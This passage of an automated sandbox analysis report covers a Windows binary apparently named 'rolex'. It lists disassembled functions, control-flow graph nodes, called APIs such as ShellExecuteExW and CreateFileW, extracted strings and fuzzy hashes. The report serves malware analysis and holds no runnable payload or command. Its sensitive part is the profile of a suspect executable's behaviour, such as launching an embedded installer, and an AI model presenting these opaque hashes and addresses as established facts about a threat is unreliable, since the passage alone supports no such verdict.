                                                                                control_flow_graph 1959 7ff7ab4bf4e0-7ff7ab4bf523 1960 7ff7ab4bf894-7ff7ab4bf8b9 call 7ff7ab491fa0 call 7ff7ab4c2320 1959->1960 1961 7ff7ab4bf529-7ff7ab4bf565 call 7ff7ab4c3cf0 1959->1961 1966 7ff7ab4bf56a-7ff7ab4bf571 1961->1966 1967 7ff7ab4bf567 1961->1967 1970 7ff7ab4bf582-7ff7ab4bf586 1966->1970 1971 7ff7ab4bf573-7ff7ab4bf577 1966->1971 1967->1966 1974 7ff7ab4bf588 1970->1974 1975 7ff7ab4bf58b-7ff7ab4bf596 1970->1975 1972 7ff7ab4bf579 1971->1972 1973 7ff7ab4bf57c-7ff7ab4bf580 1971->1973 1972->1973 1973->1975 1974->1975 1976 7ff7ab4bf628 1975->1976 1977 7ff7ab4bf59c 1975->1977 1978 7ff7ab4bf62c-7ff7ab4bf62f 1976->1978 1979 7ff7ab4bf5a2-7ff7ab4bf5a9 1977->1979 1980 7ff7ab4bf631-7ff7ab4bf635 1978->1980 1981 7ff7ab4bf637-7ff7ab4bf63a 1978->1981 1982 7ff7ab4bf5ae-7ff7ab4bf5b3 1979->1982 1983 7ff7ab4bf5ab 1979->1983 1980->1981 1986 7ff7ab4bf660-7ff7ab4bf673 call 7ff7ab4a63ac 1980->1986 1981->1986 1987 7ff7ab4bf63c-7ff7ab4bf643 1981->1987 1984 7ff7ab4bf5e5-7ff7ab4bf5f0 1982->1984 1985 7ff7ab4bf5b5 1982->1985 1983->1982 1991 7ff7ab4bf5f2 1984->1991 1992 7ff7ab4bf5f5-7ff7ab4bf5fa 1984->1992 1988 7ff7ab4bf5ca-7ff7ab4bf5d0 1985->1988 2002 7ff7ab4bf675-7ff7ab4bf693 call 7ff7ab4b13c4 1986->2002 2003 7ff7ab4bf698-7ff7ab4bf6ed call 7ff7ab4c797c call 7ff7ab49129c call 7ff7ab4a32a8 call 7ff7ab491fa0 1986->2003 1987->1986 1989 7ff7ab4bf645-7ff7ab4bf65c 1987->1989 1993 7ff7ab4bf5d2 1988->1993 1994 7ff7ab4bf5b7-7ff7ab4bf5be 1988->1994 1989->1986 1991->1992 1996 7ff7ab4bf600-7ff7ab4bf607 1992->1996 1997 7ff7ab4bf8ba-7ff7ab4bf8c1 1992->1997 1993->1984 2000 7ff7ab4bf5c0 1994->2000 2001 7ff7ab4bf5c3-7ff7ab4bf5c8 1994->2001 2004 7ff7ab4bf609 1996->2004 2005 7ff7ab4bf60c-7ff7ab4bf612 1996->2005 1998 7ff7ab4bf8c6-7ff7ab4bf8cb 1997->1998 1999 7ff7ab4bf8c3 1997->1999 2007 7ff7ab4bf8de-7ff7ab4bf8e6 1998->2007 2008 7ff7ab4bf8cd-7ff7ab4bf8d4 1998->2008 1999->1998 2000->2001 2001->1988 2009 7ff7ab4bf5d4-7ff7ab4bf5db 2001->2009 2002->2003 2026 7ff7ab4bf742-7ff7ab4bf74f ShellExecuteExW 2003->2026 2027 7ff7ab4bf6ef-7ff7ab4bf73d call 7ff7ab4c797c call 7ff7ab49129c call 7ff7ab4a5b60 call 7ff7ab491fa0 2003->2027 2004->2005 2005->1997 2006 7ff7ab4bf618-7ff7ab4bf622 2005->2006 2006->1976 2006->1979 2014 7ff7ab4bf8e8 2007->2014 2015 7ff7ab4bf8eb-7ff7ab4bf8f6 2007->2015 2012 7ff7ab4bf8d6 2008->2012 2013 7ff7ab4bf8d9 2008->2013 2016 7ff7ab4bf5e0 2009->2016 2017 7ff7ab4bf5dd 2009->2017 2012->2013 2013->2007 2014->2015 2015->1978 2016->1984 2017->2016 2028 7ff7ab4bf846-7ff7ab4bf84e 2026->2028 2029 7ff7ab4bf755-7ff7ab4bf75f 2026->2029 2027->2026 2033 7ff7ab4bf882-7ff7ab4bf88f 2028->2033 2034 7ff7ab4bf850-7ff7ab4bf866 2028->2034 2031 7ff7ab4bf761-7ff7ab4bf764 2029->2031 2032 7ff7ab4bf76f-7ff7ab4bf772 2029->2032 2031->2032 2036 7ff7ab4bf766-7ff7ab4bf76d 2031->2036 2037 7ff7ab4bf774-7ff7ab4bf77f IsWindowVisible 2032->2037 2038 7ff7ab4bf78e-7ff7ab4bf7a1 WaitForInputIdle call 7ff7ab4bfe24 2032->2038 2033->1960 2039 7ff7ab4bf868-7ff7ab4bf87b 2034->2039 2040 7ff7ab4bf87d call 7ff7ab4c220c 2034->2040 2036->2032 2042 7ff7ab4bf7e3-7ff7ab4bf7f0 CloseHandle 2036->2042 2037->2038 2043 7ff7ab4bf781-7ff7ab4bf78c ShowWindow 2037->2043 2048 7ff7ab4bf7a6-7ff7ab4bf7ad 2038->2048 2039->2040 2045 7ff7ab4bf8fb-7ff7ab4bf903 call 7ff7ab4c7904 2039->2045 2040->2033 2051 7ff7ab4bf7f2-7ff7ab4bf803 call 7ff7ab4b13c4 2042->2051 2052 7ff7ab4bf805-7ff7ab4bf80c 2042->2052 2043->2038 2048->2042 2055 7ff7ab4bf7af-7ff7ab4bf7b2 2048->2055 2051->2052 2053 7ff7ab4bf82e-7ff7ab4bf830 2051->2053 2052->2053 2054 7ff7ab4bf80e-7ff7ab4bf811 2052->2054 2053->2028 2060 7ff7ab4bf832-7ff7ab4bf835 2053->2060 2054->2053 2059 7ff7ab4bf813-7ff7ab4bf828 2054->2059 2055->2042 2061 7ff7ab4bf7b4-7ff7ab4bf7c5 GetExitCodeProcess 2055->2061 2059->2053 2060->2028 2064 7ff7ab4bf837-7ff7ab4bf845 ShowWindow 2060->2064 2061->2042 2065 7ff7ab4bf7c7-7ff7ab4bf7dc 2061->2065 2064->2028 2065->2042
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
                                                                                • String ID: .exe$.inf$Install$p
                                                                                • API String ID: 148627002-3607691742
                                                                                • Opcode ID: 1718da423bd7346896bcb56f91dbb63b3cffccde2402356a375081e8d016c4d6
                                                                                • Instruction ID: 04b4d9a7277dbf4b78d032f230b9390d30ae976814bb5301a808132fb0d91296
                                                                                • Opcode Fuzzy Hash: 1718da423bd7346896bcb56f91dbb63b3cffccde2402356a375081e8d016c4d6
                                                                                • Instruction Fuzzy Hash: FEC18E62F1AA0295FB00EBADD94027DA7B1AF85B80F854435DF4D87AB6DF3DE4518320
                                                                                Function 00007FF7AB4B8624 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101memorywindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                • String ID: PNG
                                                                                • API String ID: 541704414-364855578
                                                                                • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                • Instruction ID: 82dc82f6de6f9bc7a10d5253274535b70feae0236ba9e7b6117727e70b5d427d
                                                                                • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                • Instruction Fuzzy Hash: 93414F25A0BB0681EF44AF6AD854379EBA0AF88F94F890435CE4D47374EF7CE4498320
                                                                                Function 00007FF7AB4BF0A4 Relevance: 16.6, APIs: 11, Instructions: 102COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                                                • String ID:
                                                                                • API String ID: 4119318379-0
                                                                                • Opcode ID: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                                                                                • Instruction ID: b513e985a5749d1e67c3a718856697fa50014c49179cf7080e1c6e3cdfd5c1fc
                                                                                • Opcode Fuzzy Hash: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                                                                                • Instruction Fuzzy Hash: 0441C332B1664286F700AF79E814BA96760EB45F98FC50135DE0E07BB5CF3EE4458764
                                                                                Function 00007FF7AB4AB9B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2669 7ff7ab4ab9b4-7ff7ab4ab9e6 2670 7ff7ab4aba53 2669->2670 2671 7ff7ab4ab9e8-7ff7ab4ab9ee 2669->2671 2673 7ff7ab4aba5a-7ff7ab4aba67 2670->2673 2671->2670 2672 7ff7ab4ab9f0-7ff7ab4aba06 call 7ff7ab4add88 2671->2672 2681 7ff7ab4aba08-7ff7ab4aba3a GetProcAddressForCaller GetProcAddress 2672->2681 2682 7ff7ab4aba3c 2672->2682 2675 7ff7ab4aba69-7ff7ab4aba6c 2673->2675 2676 7ff7ab4abaad-7ff7ab4abab0 2673->2676 2679 7ff7ab4abaca-7ff7ab4abad3 GetCurrentProcessId 2675->2679 2680 7ff7ab4aba6e-7ff7ab4aba73 2675->2680 2678 7ff7ab4abab2-7ff7ab4abab4 2676->2678 2676->2679 2686 7ff7ab4ababd-7ff7ab4ababf 2678->2686 2683 7ff7ab4abae5-7ff7ab4abaff 2679->2683 2684 7ff7ab4abad5-7ff7ab4abae3 2679->2684 2687 7ff7ab4aba7c-7ff7ab4aba7e 2680->2687 2685 7ff7ab4aba43-7ff7ab4aba51 2681->2685 2682->2685 2684->2683 2684->2684 2685->2673 2686->2683 2688 7ff7ab4abac1-7ff7ab4abac8 2686->2688 2687->2683 2689 7ff7ab4aba80 2687->2689 2690 7ff7ab4aba87-7ff7ab4abaab call 7ff7ab49b66c call 7ff7ab49ba50 call 7ff7ab49b664 2688->2690 2689->2690 2690->2683
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                • API String ID: 1389829785-2207617598
                                                                                • Opcode ID: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
                                                                                • Instruction ID: 24f08c071dfafab042a5e69a4cf511d783f90666f51b38a964239d339b6a49a0
                                                                                • Opcode Fuzzy Hash: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
                                                                                • Instruction Fuzzy Hash: 24316B21A0BB0380FA55AB2EA850179A7A0AF45F94FC74139D94E433B5EE3EF541C320
                                                                                Function 00007FF7AB49EF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 2f1b3bdcd2581fc3eb11a20f3f8936e506afa36e288419d3eb12971ae08578fa
                                                                                • Instruction ID: 82febac3f64ef9f7b4243fe3f45cd69ff265688399f3bac5f8bc5ecbff9e01a5
                                                                                • Opcode Fuzzy Hash: 2f1b3bdcd2581fc3eb11a20f3f8936e506afa36e288419d3eb12971ae08578fa
                                                                                • Instruction Fuzzy Hash: 8112C362B0A74185FB10EB79D4446BDA371AB457A8F810236EA5C17AFADF3CE485C350
                                                                                Function 00007FF7AB4A24C0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3549 7ff7ab4a24c0-7ff7ab4a24fb 3550 7ff7ab4a2506 3549->3550 3551 7ff7ab4a24fd-7ff7ab4a2504 3549->3551 3552 7ff7ab4a2509-7ff7ab4a2578 3550->3552 3551->3550 3551->3552 3553 7ff7ab4a257a 3552->3553 3554 7ff7ab4a257d-7ff7ab4a25a8 CreateFileW 3552->3554 3553->3554 3555 7ff7ab4a2688-7ff7ab4a268d 3554->3555 3556 7ff7ab4a25ae-7ff7ab4a25de GetLastError call 7ff7ab4a6a0c 3554->3556 3558 7ff7ab4a2693-7ff7ab4a2697 3555->3558 3564 7ff7ab4a25e0-7ff7ab4a262a CreateFileW GetLastError 3556->3564 3565 7ff7ab4a262c 3556->3565 3560 7ff7ab4a26a5-7ff7ab4a26a9 3558->3560 3561 7ff7ab4a2699-7ff7ab4a269c 3558->3561 3562 7ff7ab4a26cf-7ff7ab4a26e3 3560->3562 3563 7ff7ab4a26ab-7ff7ab4a26af 3560->3563 3561->3560 3566 7ff7ab4a269e 3561->3566 3568 7ff7ab4a26e5-7ff7ab4a26f0 3562->3568 3569 7ff7ab4a270c-7ff7ab4a2735 call 7ff7ab4c2320 3562->3569 3563->3562 3567 7ff7ab4a26b1-7ff7ab4a26c9 SetFileTime 3563->3567 3570 7ff7ab4a2632-7ff7ab4a263a 3564->3570 3565->3570 3566->3560 3567->3562 3571 7ff7ab4a26f2-7ff7ab4a26fa 3568->3571 3572 7ff7ab4a2708 3568->3572 3573 7ff7ab4a2673-7ff7ab4a2686 3570->3573 3574 7ff7ab4a263c-7ff7ab4a2653 3570->3574 3576 7ff7ab4a26ff-7ff7ab4a2703 call 7ff7ab4920b0 3571->3576 3577 7ff7ab4a26fc 3571->3577 3572->3569 3573->3558 3578 7ff7ab4a2655-7ff7ab4a2668 3574->3578 3579 7ff7ab4a266e call 7ff7ab4c220c 3574->3579 3576->3572 3577->3576 3578->3579 3582 7ff7ab4a2736-7ff7ab4a273b call 7ff7ab4c7904 3578->3582 3579->3573
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3536497005-0
                                                                                • Opcode ID: 7e74b88d639c8d570aa5cbccebcd9353285634c108726f52f9c563d03d833b9c
                                                                                • Instruction ID: a2ea882569ee9f0d262ff4a49b8f891772c73670df66392070f53b0c6e1727d2
                                                                                • Opcode Fuzzy Hash: 7e74b88d639c8d570aa5cbccebcd9353285634c108726f52f9c563d03d833b9c
                                                                                • Instruction Fuzzy Hash: 1961E466A1A64186E7209B2DE40036EA7B1FB85BA8F911338DFAD03AF4CF3DD0549714
                                                                                Function 00007FF7AB4BB014 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                                                                • String ID: ]
                                                                                • API String ID: 2347093688-3352871620
                                                                                • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                • Instruction ID: 4954411b8cf0729f1549596bdb5a4629cded33d91405f5f4b58394062ad3f5ec
                                                                                • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                • Instruction Fuzzy Hash: 84116621B0B64245FE64BB6D9654279D792EF98BC0F890034DB5D07BB5EF2DF8048620
                                                                                Function 00007FF7AB4BFE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                • String ID:
                                                                                • API String ID: 3621893840-0
                                                                                • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                • Instruction ID: 0d05c30213a5d953a7e7dab0b3492b34be3c19e8b355e20cc41b5e82baf44889
                                                                                • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                • Instruction Fuzzy Hash: 81F06222B3944692F760A779E454B7AB311FFE4B05FC51030E64E829B4DF2CE149C720
                                                                                Function 00007FF7AB4BAE1C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Message$DialogDispatchPeekTranslate
                                                                                • String ID:
                                                                                • API String ID: 1266772231-0
                                                                                • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                • Instruction ID: 86a5ab33d42c0b23b65a85ff375430709945cb088961d3095e98ec69cf6592f5
                                                                                • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                • Instruction Fuzzy Hash: A2F04432B7994292FB50AB3DE955A36A361FFD0B05FC15031E64E42874DF2CE108C710
                                                                                Function 00007FF7AB4B91E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                • String ID: EDIT
                                                                                • API String ID: 4243998846-3080729518
                                                                                • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                • Instruction ID: d15fe72e051d138230b3e65893192395070760379726702b254eaabe03140c62
                                                                                • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                • Instruction Fuzzy Hash: B8018622B1AB8381FA60AB6EE8103F5E390AF98B40FC61431CE4D47775DF2CE1498660
                                                                                Function 00007FF7AB4A2CE0 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
